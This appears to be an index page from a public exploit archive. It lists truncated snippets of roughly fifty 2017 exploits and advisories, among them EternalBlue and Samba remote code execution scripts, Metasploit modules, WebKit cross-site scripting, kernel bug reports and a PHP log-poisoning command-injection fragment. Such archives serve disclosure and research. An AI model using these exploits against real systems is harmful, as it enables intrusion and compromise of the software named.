WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation

pageCacheState != Document::InPageCache ... mframe.document-prepareForDestruction; removeFocusedNodeOfSubtreemframe.document; ... mframe.setDocumentnullptr; domWindow; Click anywhere. function createURLdata, type = 'text/html' return URL.createObjectURLnew Blobdata, type: type; window.onclick = =...

WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting

Sources: https://bugs.chromium.org/p/project-zero/issues/detail?id=1146 https://bugs.chromium.org/p/chromium/issues/detail?id=519558 VULNERABILITY DETAILS From /WebKit/Source/core/dom/ContainerNode.cpp: ---------------- void ContainerNode::parserInsertBeforePassRefPtrWillBeRawPtr newChild, Node&...

WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting

let xml = let p = document.querySelector'p'; let link = p.appendChilddocument.createElement'link'; link.rel = 'stylesheet'; link.href = 'data:,aaaaazxczxczzxzcz'; let btn = document.body.appendChilddocument.createElement'button'; btn.id = 'btn'; btn.onfocus = = btn.onfocus = null; window.d =...

Sandboxie 5.18 - Local Denial of Service

author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: Sandboxie version 5.18 local Dos Exploit Date: 2017.05.25 Exploit Author: Greg Priest Version: Sandboxie version 5.18 ... Released on 13 April 2017 Tested on: Windows7 x64 HUN/ENG Professiona...

Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting

url; ... if !allowedToLoadFrameURLurl return; ... bool beforeLoadAllowedLoad = guardedDispatchBeforeLoadEventurl; ... bool success = beforeLoadAllowedLoad && hasValidClassId; if success success = requestObjecturl, serviceType, paramNames, paramValues; ... bool...

NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion

''' Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion Date: 2017-05-21 Exploit Author: f3ci Vendor Homepage: http://www.netgain-systems.com Software Link: http://www.netgain-systems.com/free-edition-download/ Version: = v7.2.647 build 941 Tested on: Windows...

Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow

author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.SEH Date: 2017.05.24 Exploit Author: Greg Priest Version: Dup Scout Enterprise v9.7.18 Tested on: Windows7 x64 HUN/ENG...

Samba 3.5.0 - Remote Code Execution

!/usr/bin/env python Title : ETERNALRED Date: 05/24/2017 Exploit Author: steelo Vendor Homepage: https://www.samba.org Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 CVE-2017-7494 import argparse import os.path import sys import tempfile import time from smb.SMBConnection import SMBConnection from smb import...

Apple macOS/iOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1140 netagentctlsetopt is the setsockopt handler for netagent control sockets. Options of type NETAGENTOPTIONTYPEREGISTER are handled by netagenthandleregistersetopt. Here's the code: static errnot...

Apple macOS/iOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1123 unpexternalize is responsible for externalizing the file descriptors carried within a unix domain socket message. That means allocating new fd table entries in the receiver and recreating a file which looks looks to userspac...

Apple macOS/iOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1175 CAMediaTimingFunctionBuiltin is a class in QuartzCore. Its initWithCoder: method reads an Int "index" then passes that to builtinfunction mov ebx, edi -- controlled unsigned int mov r14d, ebx lea r15, ZL9functions0 ; functions...

Apple macOS/iOS - NSUnarchiver Heap Corruption Due to Lack of Bounds Checking in [NSBuiltinCharacterSet initWithCoder:]

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1170 Via NSUnarchiver we can read NSBuiltinCharacterSet with a controlled serialized state. It reads a controlled int using decodeValueOfObjCType:"i" then either passes it to CFCharacterSetGetPredefined or uses it directly to...

Apple macOS/iOS - Memory Corruption Due to Bad Bounds Checking in NSCharacterSet Coding for NSKeyedUnarchiver

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1168 The dump today has this list of iOS stuff: https://wikileaks.org/ciav7p1/cms/page13205587.html Reading through this sounded interesting: """ Buffer Overflow caused by deserialization parsing error in Foundation library Sending...

Apple macOS/iOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1172 Using lldb inside a simple helloworld app for iOS we can see that there are over 600 classes which we could get deserialized for persistance for example. The TextInput framework which is loaded has a class TIKeyboardLayout. Th...

VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VX Search Enterprise GET Buffer Overflow', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability in the web interfac...

Apple macOS - Lack of Bounds Checking in HIServices Custom CFObject Serialization Local Privilege Escalation

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1219 HIServices.framework is used by a handful of deamons and implements its own CFObject serialization mechanism. The entrypoint to the deserialization code is AXUnserializeCFType; it reads a type field and uses that to index an...

Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution

!/usr/bin/python3 TARGET: AeroHive AP340 HiveOS $cmd"; die; ?" URL of the login page where we will inject our PHP command exec code so it poisons the log file posturl= "/login.php5?version=6.1r2" postfields = "loginauth" : "1", "miniHiveUI" : "1", "userName" : payloadinject, "password" : "1234"...

Apple macOS - '32-bit syscall exit' Kernel Register Leak

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1149 The XNU kernel, when compiled for a x86-64 CPU, can run 32-bit x86 binaries in compatibility mode. 32-bit binaries use partly separate syscall entry and exit paths. To return to userspace, unixsyscall in...

Apple macOS - 'stackshot' Raw Frame Pointers

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1164 This is an issue that allows unentitled root to read kernel frame pointers, which might be useful in combination with a kernel memory corruption bug. By design, the syscall stacksnapshotwithconfig permits unentitled root to du...

Linux Kernel 4.11 - eBPF Verifier Log Leaks Lower Half of map Pointer

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1251 When the eBPF verifier kernel/bpf/verifier.c runs in verbose mode, it dumps all processed instructions to a user-accessible buffer in human-readable form using printbpfinsn. For instructions with class BPFLD and mode BPFIMM,...

VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142 This vulnerability permits an unprivileged user on a Linux machine on which VMWare Workstation is installed to gain root privileges. The issue is that, for VMs with audio, the privileged VM host process loads libasound, whic...

PlaySMS 1.4 - 'import.php' Remote Code Execution

Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php Date: 21-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website: http://touhidshaikh.com/ Category: webapps ...

Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery

Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt + ISR: ApparitionSec Vendor: ================ www.mantisbt.org Product: ========= Mantis Bug Tracker 1.3.10 / v2.3.0 MantisBT...

Secure Auditor 3.0 - Directory Traversal

Credits: John Page aka HYP3RLINX + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt + ISR: ApparitionSec Vendor: ==================== www.secure-bytes.com Product: ===================== Secure Auditor - v3.0 Secure...

KMCIS CaseAware - Cross-Site Scripting

Exploit Title: CaseAware Cross Site Scripting Vulnerability Date: 20th May 2017 Exploit Author: justpentest Vendor Homepage: https://caseaware.com/ Version: All the versions Contact: [email protected] CVE : 2017-5631 Source:...

Belden Garrettcom 6K/10K Switches - Authentication Bypass / Memory Corruption

Introduction ------------ Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT Magnum series network switches. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that...

Joomla! 3.7.0 - 'com_fields' SQL Injection

Exploit Title: Joomla 3.7.0 - Sql Injection Date: 05-19-2017 Exploit Author: Mateus Lino Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html Vendor Homepage: https://www.joomla.org/ Version: = 3.7.0 Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux...

Oracle PeopleSoft - Server-Side Request Forgery

Application: Oracle PeopleSoft Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55; PeopleSoft HCM 9.2 Vendor URL: http://oracle.com Bugs: SSRF Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory: 18.04.2017 Reference: Oracle CPU April 2017 Author: Roman Shalymov...

Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)

Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow PoC Date: 5-19-17 Exploit Author: Chance Johnson [email protected] Vendor Homepage: http://www.surething.com/ Software Link: http://www.surething.com/disclabeler Version: 6.2.138.0 Tested on: Windows 7 x64 / Windows 10 Usage: Ope...

D-Link DIR-600M Wireless N 150 - Authentication Bypass

Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass Date: 19-05-2017 Software Link: http://www.dlink.co.in/products/?pid=DIR-600M Exploit Author: Touhid M.Shaikh Vendor : www.dlink.com Contact : http://twitter.com/touhidshaikh22 Version: Hardware version: C1 Firmware version: 3.04...

PlaySMS 1.4 - Remote Code Execution

Exploit Title: PlaySMS 1.4 Remote Code Execution to Poisoning admin log Date: 19-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website: http://touhidshaikh.com/ Category: webapps 1. Description Remote...

Tecnovision DLX Spot - SSH Backdoor Access

Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password. Google Dork: "DlxSpot - Player4" Date: 2017-05-14 Discoverer: Simon Brannstrom Authors Website: https://unknownpwn.github.io/ Vendor Homepage: http://www.tecnovision.com/ Software Link: n/a Version: All known versions...

Tecnovision DLX Spot - Authentication Bypass

Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL Injection Google Dork: "DlxSpot - Player4" Date: 2017-05-14 Discoverer: Simon Brannstrom Authors Website: https://unknownpwn.github.io/ Vendor Homepage: http://www.tecnovision.com/ Software Link: n/a Version: 1.5.10 Tested on:...

Tecnovision DLX Spot - Arbitrary File Upload

Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload to RCE Google Dork: "DlxSpot - Player4" Date: 2017-05-14 Discoverer: Simon Brannstrom Authors Website: https://unknownpwn.github.io/ Vendor Homepage: http://www.tecnovision.com/ Software Link: n/a Version: 1.5.10 Tested on:...

ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass

Title: ManageEngine ServiceDesk Plus Application Compromise Date: 19 May 2017 Researcher: Steven Lackey ByteM3 Product: ServiceDesk Plus http://www.manageengine.com/ Affected Version: 9.0 Other versions could also be affected Fixed Version: Service Pack 9241 – Build 9.2 Vulnerability Impact: High...

SAP Business One for Android 1.2.3 - XML External Entity Injection

Exploit Title: Blind XXE XML External Entityin SAP Date of Disclosure: 17/05/2017 Author: Ravindra Singh Rathore Vendor Homepage: https://www.sap.com/products/business-one.html Product - SAP Business One Android Application Version - 1.2.3 Security Note: 2378065 CVE - CVE-2016-6256 CVSS - 6.5 XXE...

KDE 4/5 - 'KAuth' Local Privilege Escalation

// cc -Wall smb0k.c -pedantic -std=c11 // // smb4k PoC, also demonstrating broader scope of a generic kde // authentication bypass vulnerability // // C 2017 Sebastian Krahmer // define POSIXCSOURCE 200112L include include include include include include include include include void dieconst char...

Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity

!/usr/bin/python3 Oracle PeopleSoft SYSTEM RCE https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce cf 2017-05-17 import requests import urllib.parse import re import string import random import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning...

Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

!/usr/bin/python from impacket import smb from struct import pack import sys import socket ''' EternalBlue exploit for Windows 7/2008 by sleepya The exploit might FAIL and CRASH a target system depended on what is overwritten EDB Note: Shellcode - x64...

INFOR EAM 11.0 Build 201410 - 'filtervalue' SQL Injection

SQL injection in INFOR EAM V11.0 Build 201410 search fields web/base/.. via filtervalue parameter ------------------- Assigned CVE: CVE-2017-7952 Reproduction steps: ------------------- 1. Log in with your EAM account 2. Go to any page with a search or filter field in it for example...

INFOR EAM 11.0 Build 201410 - Persistent Cross-Site Scripting via Comment Fields

Stored XSS in INFOR EAM V11.0 Build 201410 via comment fields ------------------- Assigned CVE: CVE-2017-7953 Reproduction steps: ------------------- 1. Log in with your EAM account 2. Go to the jobs page 3. Click on a record and open its page 4. Go to "Comments" tab 4. Click the add new comment...

Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service

function done var x = ''; for i=0; i'; var uri = 'data:image/svg+xml,' + x; var i = new Image; i.src = uri; !-- Visiting https://bugzilla.mozilla.org/attachment.cgi?id=8817075 may likely crash your browser tab. Debug Information: ============== ff4.1108: Stack overflow - code c00000fd first chanc...

Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Dup Scout Enterprise GET Buffer Overflow', 'Description' = %q This module exploits a stack-based buffer overflow vulnerability ...

Apple iOS < 10.3.2 - Notifications API Denial of Service

Exploit Title: Apple iOS 10.3.2 - Notifications API Denial of Service Date: 05-15-2017 Exploit Author: Sem Voigtländer @OxFEEDFACE, Vincent Desmurs @vincedes3 and Joseph Shenton Vendor Homepage: https://apple.com Software Link: https://support.apple.com/en-us/HT207798 Version: iOS 10.3.2 Tested o...

WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress PHPMailer Host Header Command Injection', 'Description' = %q This module exploits a command injection vulnerability in WordPress version...

Adobe Flash - Margin Handling Heap Corruption

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1174 The attached fuzzed swf causes a crash due to heap corruption when processing the margins of a rich text field. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42018.zip...

Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112 Windows: Running Object Table Register ROTFLAGSALLOWANYCLIENT EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7 Class: Elevation of Privilege Summary: By setting an appropriate AppID it’s possible for a...

Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

!/usr/bin/python from impacket import smb, ntlm from struct import pack import sys import socket ''' EternalBlue exploit for Windows 8 and 2012 by sleepya The exploit might FAIL and CRASH a target system depended on what is overwritten The exploit support only x64 target EDB Note: Shellcode - x64...

Serviio Media Server - checkStreamUrl Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule /Restlet-Framework/ include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initializeinfo = superupdateinfoinfo, 'Name' =...

BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "BuilderEngine Arbitrary File Upload Vulnerability and execution", 'Description' = %q This module exploits a vulnerability found in BuilderEngine...